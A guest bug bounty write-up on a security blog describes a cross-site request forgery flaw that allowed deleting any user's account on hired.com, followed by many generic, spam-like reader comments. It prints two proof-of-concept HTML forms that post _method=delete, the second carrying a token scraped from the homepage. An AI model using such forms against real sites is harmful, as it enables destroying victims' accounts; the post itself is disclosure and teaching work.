Account Deletion CSRF vulnerability in hired
This post is published by Bug Bounty POC at the request of Yasir as a guest writer. Note that the post is written by Yasir, and any mistakes in the write-up are his own. We allow anyone to write content on our blog as a guest so that others can also learn. If you are interested in sharing your finding through the Bug Bounty POC platform, contact us on our Facebook group or via email at support@bugbountypoc.com.
Hello BugBountyPoc viewers, I am Yasir, an independent security researcher. Today I want to share a bug that may help beginners learn CSRF exploitation, so let's begin.

The bug was in the Hired program (www.hired.com). Through this vulnerability I was able to delete anyone's account. It came in two parts: the first one I reported turned out to be a duplicate; the second one got me the bounty.

In the first CSRF, the account-deletion endpoint did not require a CSRF token or parameter at all. A form hosted on any site could delete the account of a logged-in victim: the browser attaches the victim's hired.com session cookie to the cross-site POST automatically, and nothing in the request proved that the victim intended it. Browser forms can only send GET and POST, so the form carries _method=delete in the body, the override convention Rails-style applications use to route a POST to the DELETE action.
PoC:

Request: POST https://hired.com/xx
POST data: _method=delete

Or, as a form that an attacker can host on any page:
<!-- Cross-site form: the victim's browser adds the hired.com session cookie itself -->
<html>
<body>
<form action="https://hired.com/xx" method="POST">
<input type="hidden" name="_method" value="delete" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Unfortunately this was a duplicate.
The second one was trickier: here the CSRF parameter and token were required. I tried many things, changing the method to GET or PUT, removing the token, null bytes and so on, but none of them worked, and at that point I gave up. Later I found that a "fake" but valid CSRF token was enough. I checked the page source and saw that the site issues a different CSRF token for each task, so I opened the homepage and searched its source for a CSRF token:

(Q8LmL2bzuRRnDkQgabCD7xs3W1/3zLVUkcR05t+CHIE1GsaJ7QyqK15+zl/8bkE9Fe1l7M5zvAOMrmgtGMz/Dw==)

I copied that token into the form and tried it against another account. Hurrah, the token from the homepage worked for the other account too, and the account was deleted. In other words, the server checked that an authenticity_token was present and valid, but not that it belonged to the session submitting the request, so a token scraped from a public page acts as a universal key for every account.
PoC:

<!-- Same cross-site form, now carrying a token scraped from the homepage -->
<html>
<body>
<form action="https://hired.com/xx" method="POST">
<input type="hidden" name="_method" value="delete" />
<input type="hidden" name="authenticity_token" value="Q8LmL2bzuRRnDkQgabCD7xs3W1/3zLVUkcR05t+CHIE1GsaJ7QyqK15+zl/8bkE9Fe1l7M5zvAOMrmgtGMz/Dw==" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This taught me a lesson: check each and every thing. Follow me on Twitter: @zargaryasir.
I would like to thank Hired for giving me a bounty.
F*ckin' tremendous issues here. I am very satisfied to see your post. Thank you so much, and I am looking forward to getting in touch with you. Will you kindly drop me a mail?
You have touched some nice factors here. Anyway, keep up writing. Best regards
I really enjoy your article. Good job :-)!
You made some nice points there. I did a search on the issue and found most persons will agree with your website.
Write more, that's all I have to say. Literally, it seems as though you relied on the video to make your point. You obviously know what you're talking about, why waste your intelligence on just posting videos to your site when you could be giving us something enlightening to read?
Simply wanna remark that you have a very decent web site, I like the style and design, it really stands out.
I precisely needed to appreciate you again. I do not know the things I might have sorted out without the strategies documented by you regarding that area of interest. It absolutely was a real horrifying scenario in my opinion, but looking at this skilled way you dealt with it made me to leap with fulfillment. I am thankful for the information and thus expect you realize what a powerful job you happen to be getting into teaching people using your webblog. I’m certain you haven’t come across all of us.
WOW,another great share, thank you so much!
Thanks a lot for sharing this with all people you actually realize what you are speaking approximately! Bookmarked. Please also talk over with my site =). We can have a hyperlink change contract between us!
Thank you for another excellent article. Where else may just anyone get that kind of info in such a perfect way of writing? I have a presentation subsequent week, and I am on the search for such information.
I appreciate, lead to I discovered exactly what I was looking for. You have ended my 4 day long hunt! God Bless you man. Have a nice day. Bye
I would like to get across my love for your kind-heartedness giving support to people who must have help with your issue. Your personal commitment to passing the message all over turned out to be exceedingly practical and has usually encouraged employees like me to achieve their targets. Your personal warm and friendly suggestions means much a person like me and even further to my fellow workers. With thanks; from everyone of us.
You made certain good points there. I did a search on the theme and found the majority of folks will agree with your blog.
This is really interesting, You are a very skilled blogger. I have joined your feed and look forward to seeking more of your wonderful post. Also, I have shared your website in my social networks!
Thank you a lot for providing individuals with an extremely pleasant possibility to check tips from here. It is usually so superb and as well, packed with a good time for me personally and my office acquaintances to visit your site at the very least thrice every week to read through the new stuff you will have. And definitely, I'm always impressed concerning the striking tactics you give. Some two facts on this page are absolutely the most effective I have ever had.
You are a very bright person!
I'll immediately grab your RSS as I can't find your e-mail subscription hyperlink or newsletter service. Do you have any? Please let me know so that I can subscribe. Thanks.
There is obviously a bundle to identify about this. I consider you made various nice points in features also.
Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed surfing around your blog posts. After all I will be subscribing to your feed and I hope you write again soon!
you’re truly a good webmaster. The web site loading speed is amazing. It kind of feels that you are doing any unique trick. Also, The contents are masterwork. you have performed a wonderful activity on this topic!
I always used to read smaller articles that also make their motive clear, and that is also happening with this paragraph which I am reading at this place.
Hi there! I could have sworn I've been to this site before but after checking through some of the posts I realized it's new to me. Anyways, I'm definitely glad I found it and I'll be book-marking and checking back frequently!
Happy to visit your page:-). Good post, looking for more. Best regards
Thanks a bunch for sharing this with all folks you actually recognize what you’re speaking approximately! Bookmarked. Please also visit my web site =). We will have a link alternate contract among us!
I was recommended this website by my cousin. I’m not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!
Heya, I'm here for the first time. I came across this board and I find it really useful & it helped me out much. I hope to give something back and help others like you helped me.
Very good blog. Please read something mine. See you!
Excellent site. Plenty of helpful information here. I am sending it to some buddies and also sharing on Delicious. And certainly, thanks for your effort!
I've been absent for some time, but now I remember why I used to love this blog. Thanks, I'll try and check back more often. How frequently do you update your web site?
Thank you for another informative site. Where else could I be getting that type of info written in such an ideal way? I have a mission that I am just now running on, and I have been on the look out for such info.
Very well written information. It will be beneficial to everyone who utilizes it, as well as myself. Keep up the good work – i will definitely read more posts.
I enjoy your writing style truly enjoying this site.
I am continuously browsing online for ideas that can aid me. Thanks!
magnificent put up, very informative. I’m wondering why the other experts of this sector do not notice this. You should continue your writing. I’m confident, you’ve a huge readers’ base already!
Heya, I'm here for the first time. I came across this board and I find it truly useful & it helped me out a lot. I hope to give something back and help others like you helped me.
I was suggested this blog by my cousin. I'm not sure whether this post is written by him as nobody else knows such detail about my problem. You are incredible! Thanks!
It's actually a great and helpful piece of information. I'm happy that you just shared this useful information with us. Please keep us informed like this. Thanks for sharing.
Keep working, great job!
Definitely, what a fantastic website and educative posts, I will bookmark your website. Best regards!
Just want to say your article is astonishing. The clarity in your post is simply great and I can assume you are an expert on this subject. Well, with your permission let me grab your RSS feed to keep up to date with forthcoming posts. Thanks a million and please keep up the gratifying work.
Great tremendous issues here. I am very satisfied to peer your post. Thanks a lot and i’m taking a look ahead to contact you. Will you please drop me a mail?
I am extremely impressed with your writing skills and also with the layout on your blog. Is this a paid theme or did you customize it yourself? Anyway keep up the excellent quality writing, it’s rare to see a nice blog like this one today..
This is really interesting, you're a very skilled blogger. I have joined your RSS feed and look forward to seeking more of your fantastic posts. Also, I have shared your website in my social networks!
Useful information. Fortunate me, I found your website by accident, and I'm surprised why this coincidence did not come about in advance! I bookmarked it.
Howdy, very cool site!! Man .. Beautiful .. Amazing .. I will bookmark your website and take the feeds also... I am happy to find numerous helpful information right here within the submit, we want to work out more strategies in this regard, thank you for sharing.
Hello there, I discovered your blog by means of Google while searching for a similar subject, your site got here up, it seems great. I’ve bookmarked it in my google bookmarks.
My brother recommended I might like this web site. He was totally right. This post truly made my day. You can't imagine just how much time I had spent looking for this information! Thanks!
Thanks.. 🙂
I'll right away grab your RSS feed as I cannot find your e-mail subscription link or newsletter service. Do you have any? Kindly let me know so that I may subscribe. Thanks.
Hey, sorry! Currently we don't have any RSS feed or email subscription!
But you can join our group on Facebook.com
https://www.facebook.com/groups/986000878157257/ for more updates! 🙂
Happy Hacking!
Regards
Bharat Sewani
Wow! This can be one particular of the most beneficial blogs We have ever arrive across on this subject. Actually Great. I am also an expert in this topic therefore I can understand your hard work.
thanks!
I have learned a few just right things here. Definitely worth bookmarking for revisiting. I wonder how much effort you put in to make such a fantastic informative web site.
Thanks a lot mate..! 🙂
It's the best time to make some plans for the longer term and it is time to be happy. I've read this post and, if I may, I'd like to suggest some interesting things or tips. Perhaps you can write subsequent articles relating to this article. I wish to learn even more things about it!
Sure! Just stay with us!
We always try to update something new for folks!
And it's our pleasure if you read our blog!
Thanks
Happy hacking!
Hey there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog and look forward to new posts.
Hey, sorry! We are not active on Twitter!
But you can join our Facebook group https://www.facebook.com/groups/986000878157257/ where you can learn a lot of new stuff
about bug bounty and ethical hacking!
Happy Hacking
Regards
Bharat Sewani
Hi there! This is my first visit to your blog! We are a team of volunteers starting a new initiative in a community in the same niche. Your blog provided us valuable information to work on. You have done a marvellous job!
Keep functioning, fantastic job!